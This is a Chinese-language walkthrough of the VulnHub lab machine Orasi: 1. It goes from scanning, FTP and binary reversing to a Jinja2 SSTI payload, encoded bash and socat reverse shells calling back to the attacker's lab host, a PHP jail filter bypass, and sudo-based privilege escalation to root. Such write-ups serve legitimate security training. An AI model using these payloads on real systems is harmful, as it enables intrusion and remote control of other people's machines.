准备:
攻击机:虚拟机kali、本机win10。
靶机:Orasi: 1,下载地址:https://download.vulnhub.com/orasi/Orasi.ova,下载后直接vbox打开即可。
知识点:hex编码、ida逆向、AndroidKiller逆向、ffuf爆破、ssti漏洞、shell反弹、敏感信息发现、信息利用。
隐藏信息:Hint : just one useless little dot,在下载时发现的。
一:信息收集
1.nmap扫描
使用nmap扫描下靶机地址,命令:nmap -sn 192.168.5.0/24,发现靶机地址:192.168.5.156。
使用nmap扫描下端口对应的服务:nmap -T4 -sV -p- -A 192.168.5.156,显示开放了21端口、22端口、80端口、5000端口,开启了ftp服务、ssh服务、http服务。其中ftp服务显示允许匿名登录。
2.ftp服务
使用nmap获得的信息匿名登录ftp服务,命令:ftp 192.168.5.156,登录到ftp服务后发现一个url文件,将该文件下载到本地。
执行下载的url文件,返回信息,告诉我们有些事情不太明显,将文件复制到本地使用ida进行逆向,但是查看其伪代码时未发现可以利用的信息。
Sometimes things are not obvious
Element found: 36逆向伪代码
#逆向的伪代码
int __cdecl main(int argc, const char **argv, const char **envp)
{
init = (__int64)malloc(8uLL);
*(_BYTE *)init = 111;
*(_DWORD *)(init + 4) = -1;
insert(1LL, 47LL);
insert(2LL, 115LL);
insert(42LL, 104LL);
insert(4LL, 52LL);
insert(12LL, 100LL);
insert(14LL, 48LL);
insert(17LL, 119LL);
insert(18LL, 36LL);
insert(19LL, 115LL);
puts("Sometimes things are not obvious");
item = search(18LL);
if ( item )
printf("Element found: %d\n", (unsigned int)*(char *)item);
else
puts("Element not found");
return 0;
}习惯了先看伪代码,但是这里没发现什么有用的信息,后面在程序逻辑图(ida view-1)中发现其寄存器的值连起来是:/sh4d0w$s,猜测是一个目录信息。
3.web访问
访问下80端口和5000端口的web服务并分别访问下/sh4d0w$s目录,在http://192.168.5.156/得到一组信息:6 6 1337leet,暂时不知道作用,在http://192.168.5.156:5000/sh4d0w$s得到提示信息:not input,告诉我们缺少输入。
4.参数爆破
那就直接使用ffuf进行爆破,命令:ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt -u 'http://192.168.5.156:5000/sh4d0w\$s?FUZZ=../../../../../etc/passwd' -fs 8,但是未爆破出来。
后面想到在http://192.168.5.156/得到一组信息:6 6 1337leet,这里想了一下应该是告诉我们参数是6位,由1337leet中的六位组成的意思,后面想到了字典生成工具crunch,那就生成一个字典,命令:crunch 6 6 1337leet > cs.txt,然后继续使用ffuf进行爆破,最后成功获得参数:l333tt。
二:信息利用
1.ssti注入
在http://192.168.5.156:5000/sh4d0w$s页面传递l333tt参数为id,http://192.168.5.156:5000/sh4d0w$s?l333tt=id,但是返回了传入的值,未进行执行。
测试下是否是ssti注入漏洞,将传递的id修改为:{{3*3}},发现3*3被执行,因此这里存在ssti注入漏洞。
在网上查找下ssti注入可以利用的语句,然后进行访问看是否可以正常执行我们输入的命令。
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("id").read().zfill(417)}}{%endif%}{% endfor %}2.shell反弹
现在可以执行我们的命令了那我们就直接进行shell反弹,这里需要对shell反弹语句进行编码,然后在靶机中开启对6688端口的监听,然后访问:http://192.168.5.156:5000/sh4d0w$s?l333tt={%%20for%20x%20in%20().__class__.__base__.__subclasses__()%20%}{%%20if%20%22warning%22%20in%20x.__name__%20%}{{x()._module.__builtins__[%27__import__%27](%27os%27).popen(%22\142\141\163\150\40\55\143\40\47\142\141\163\150\40\55\151\40\76\46\40\57\144\145\166\57\164\143\160\57\61\71\62\56\61\66\70\56\65\56\61\65\60\57\66\66\70\70\40\60\76\46\61\47%20%22).read().zfill(417)}}{%endif%}{%%20endfor%20%}即可获得shell权限。
#字符编码代码,替换下strings即可,后面还要用到这个
oct_result,dec_result,hex_result,bin_result = '','','',''
strings = "import os;os.system('/bin/bash -i');"
#bash -i >& /dev/tcp/192.168.5.150/6688 0>&1
for string in strings:
one_char = ord(string)
dec_result = dec_result + str(one_char) + ' '
oct_result = oct_result + str(oct(one_char).replace('0o','\\'))
hex_result = hex_result + hex(one_char).replace('0x','')
bin_result = bin_result + bin(one_char) + ' '
print('十进制数据:' + dec_result)
print('八进制数据:' + oct_result)
print('十六进制数据:' + hex_result)
print('二进制数据:' + bin_result)#原语句
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("bash -c 'bash -i >&/dev/tcp/192.168.5.150/6688 0>&1'").read().zfill(417)}}{%endif%}{% endfor %}
#shell反弹语句编码后的语句
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("\142\141\163\150\40\55\143\40\47\142\141\163\150\40\55\151\40\76\46\40\57\144\145\166\57\164\143\160\57\61\71\62\56\61\66\70\56\65\56\61\65\60\57\66\66\70\70\40\60\76\46\61\47
").read().zfill(417)}}{%endif%}{% endfor %}三:提权
1.提权-kori
使用sudo -l查看下当前账户是否存在可以使用的特权命令,发现存在:(kori) NOPASSWD: /bin/php /home/kori/jail.php *。
分析下jail.php文件,使用exec执行了我们输入的参数,但是对参数进行了过滤,不能出现|bash|eval|nc|whoami等字符。
<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
if($var == null) die("Orasis Jail, argument missing\n");
function filter($var) {
if(preg_match('/(`|bash|eval|nc|whoami|open|pass|require|include|file|system|\/)/i', $var)) {
return false;
}
return true;
}
if(filter($var)) {
$result = exec($var);
echo "$result\n";
echo "Command executed";
} else {
echo "Restricted characters has been used";
}
echo "\n";
?>开始使用下面几个要么能连但是权限不对,要不就连上之后无法执行命令,接着换shell语句尝试,最后发现socat TCP:192.168.5.150:8899 EXEC:sh可以,然后获得新的shell权限并成功提权到kori权限。
#出现问题
sudo -u kori /bin/php /home/kori/jail.php sh -i >& /dev/tcp/192.168.5.150/8899 0>&1
sudo -u kori /bin/php /home/kori/jail.php 0<&196;exec 196<>/dev/tcp/192.168.5.150/88991; sh <&196 >&196 2>&196
#最后发现这个可以
sudo -u kori /bin/php /home/kori/jail.php socat TCP:192.168.5.150:8899 EXEC:sh2.提权-irida
继续使用sudo -l查看下当前账户是否存在可以使用的特权命令,发现存在:(irida) NOPASSWD: /usr/bin/cp /home/irida/irida.apk /home/kori/irida.apk。
那就直接将该apk文件复制到/home/kori目录下,命令:sudo -u irida /usr/bin/cp /home/irida/irida.apk /home/kori/irida.apk,但是显示不被允许。
这里应该是irida账户缺少对kori目录的写入权限,那我们就赋予irida账户写入权限,命令chmond o+w /home/kori,然后建立一个irida.apk文件,命令:touch irida.apk,然后赋予777权限,不然复制的文件还是缺少权限,然后将该文件复制过来,命令:sudo -u irida /usr/bin/cp /home/irida/irida.apk /home/kori/irida.apk。
在靶机中开启http服务:python3 -m http.server,将apk文件下载到本地,然后使用AndroidKiller进行逆向分析。使用AndroidKiller工具时需要安装java环境并且需要替换下*\AndroidKiller\bin\apktool\apktool目录下的文件并修改apktool.bat、apktool.ini的指向,不然无法逆向时会失败。替换的文件地址:链接:https://pan.baidu.com/s/1QEM6bYkcHLPtz6PkFlwC5Q,提取码:upfn。
在找到的文件中右键查看-查看源码中观察源码信息,代码的意思是:传入了1#2#3#4#5,然后以#进行拆分,然后对五个参数赋值,再然后通过.将五个参数连接起来,结果就是:eye.of.the.tiger.()。
直接使用eye.of.the.tiger.()作为密码来切换到irida账户时会报错,这时想起来开始在下载页面看到的提示信息:Hint : just one useless little dot,告诉我们只有一个无用的点,那我们依次尝试,最后发现正确的密码是:eye.of.the.tiger(),然后成功切换到irida账户。
获得irida账户权限后在/home/irida目录下读取user.txt文件,成功获得flag值。
3.提权-root
继续使用sudo -l查看下当前账户是否存在可以使用的特权命令,发现存在:(root) NOPASSWD: /usr/bin/python3 /root/oras.py。
那我们就直接运行下/root/oras.py文件,命令:sudo /usr/bin/python3 /root/oras.py,随便输入参数,回显告诉我们要输入hexstr。
那我们随便输入一个hex字符:69进行测试,根据报错信息我们得知执行的是exec函数。
那就将import os;os.system("/bin/bash -i");代码进行hash编码,然后输入执行,成功提权到root账户。
获得root权限后在/root目录下发现root.txt文件,读取该文件成功获得flag值。
